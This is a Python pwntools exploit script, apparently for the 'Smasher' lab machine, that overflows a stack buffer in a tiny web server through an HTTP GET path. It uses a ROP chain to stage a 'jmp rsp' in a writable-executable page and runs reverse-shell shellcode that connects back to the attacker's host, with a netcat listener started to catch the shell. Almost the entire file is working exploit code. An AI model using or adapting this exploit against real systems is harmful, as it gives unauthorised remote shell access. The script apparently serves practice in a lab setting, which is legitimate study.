#!/usr/bin/python
import os
import struct
import sys

from pwn import *
# Deliberately placed after the pwntools star-import: pwn also exports a
# urlencode() helper (pwnlib.util.fiddling); this script relies on the name
# resolving to urllib's quote(), so the order must not be "fixed".
from urllib import quote as urlencode
if "TMUX" in os.environ:
context.terminal = ['tmux', 'splitw', '-v']
RHOST = "10.10.10.89"
RPORT = "1111"
LHOST = sys.argv[1]
LPORT = sys.argv[2]
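def format(val):
    """Pack an address component into the byte layout the reverse-shell stub expects.

    NOTE: this shadows the builtin ``format``; the name is kept because the
    shellcode builder below calls it.

    Args:
        val: either a dotted-quad IPv4 address ("10.10.14.2") or a decimal
            TCP port ("4444"), both as passed on the command line.

    Returns:
        For an IPv4 address: its four octets as 4 bytes in network order,
        consumed by the ``push imm32`` at the start of the stub.
        For a port: exactly 2 bytes, big-endian (network order), consumed by
        the ``push imm16`` that follows it.

    Raises:
        ValueError: if the address does not have exactly four octets, an octet
            or the port is not an integer, an octet is outside 0..255, or the
            port is outside 0..65535.
    """
    if '.' in val:
        octets = val.split('.')
        if len(octets) != 4:
            raise ValueError("expected a dotted-quad IPv4 address, got %r" % (val,))
        try:
            return struct.pack('4B', *[int(octet) for octet in octets])
        except struct.error:
            raise ValueError("IPv4 octet out of range in %r" % (val,))

    port = int(val)
    if not 0 <= port <= 0xffff:
        raise ValueError("port out of range (0-65535): %d" % port)
    # Fixed two-byte width matters: a minimal-width pack emits a single byte
    # for ports below 256, which leaves `push imm16` one byte short and
    # desynchronises every instruction after it.
    return struct.pack('>H', port)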
# Connect to the target first; the payload is only sent once the listener
# below is up.
r = remote(RHOST, RPORT)

# Padding up to the saved return address (568 bytes for this target).
junk = "A" * 568

# ROP chain built from absolute gadget addresses, so the target binary is
# assumed not to be PIE (addresses in the 0x401xxx text range, data page at
# 0x603000-0x604000). The chain stages the two bytes ff e4 (`jmp rsp`) into
# the binary's rwx data page and then returns into them, so execution lands
# on whatever follows the chain on the stack: the shellcode.
rop_chain = flat (
    0x401106,  # 0x0000000000401106 : pop r13 ; ret
    0xe4ff,    # r13 <- 0xe4ff; written little-endian this is ff e4 = `jmp rsp`
    0x4010ff,  # 0x00000000004010ff : mov rax, r13 ; pop rbx ; pop rbp ; pop r12 ; pop r13 ; ret
    "B" * 32,  # filler consumed by the four pops of the gadget above
    0x4011dd,  # 0x00000000004011dd : pop rdi ; ret
    0x603500,  # RDI <- scratch address inside 0x00603000-0x00604000 rwxp /root/Smasher/tiny
    0x401304,  # 0x0000000000401304 : mov dword ptr [rdi + 4], eax ; ret  -> ff e4 00 00 at 0x603504
    0x603504,  # return into the freshly written `jmp rsp`
    endianness = 'little', word_size = 64, sign = False)
shellcode = ""
shellcode += "\x68" + format(LHOST) + "\x66\x68" + format(LPORT) + "\x66\x6a\x02\x6a\x2a\x6a\x10"
shellcode += "\x6a\x29\x6a\x01\x6a\x02\x5f\x5e\x48\x31\xd2\x58\x0f\x05\x48\x89"
shellcode += "\xc7\x5a\x58\x48\x89\xe6\x0f\x05\x48\x31\xf6\xb0\x21\x0f\x05\x48"
shellcode += "\xff\xc6\x48\x83\xfe\x02\x7e\xf3\x48\x31\xc0\x48\xbf\x2f\x2f\x62"
shellcode += "\x69\x6e\x2f\x73\x68\x48\x31\xf6\x56\x57\x48\x89\xe7\x48\x31\xd2"
shellcode += "\xb0\x3b\x0f\x05"
# The overflow travels in the request path, so the raw bytes (NULs and other
# non-printables included) are percent-encoded; the target is expected to
# decode them back before copying. Chain and shellcode must stay contiguous:
# the staged `jmp rsp` lands right after the chain on the stack.
payload = 'GET ' + urlencode(junk + rop_chain + shellcode) + '\r\n\r\n'
log.info("Payload length: %i" % len(payload))

# Start the catcher before the payload goes out: the shellcode connects back
# to LHOST:LPORT as soon as it runs. The fixed 1 s pause is a best-effort wait
# for nc to bind; if the terminal is slow to spawn the callback can be missed.
# `-lvp` is the traditional/GNU netcat flag set; other nc variants may differ.
log.info("Setting listener...")
run_in_new_terminal("nc -lvp " + LPORT)
sleep(1)

log.info("Sending payload...")
r.send(payload)
# Whatever the service answers before (or instead of) crashing; this is a
# single blocking read, so it returns once the target replies or hangs up.
print r.recv()
r.close()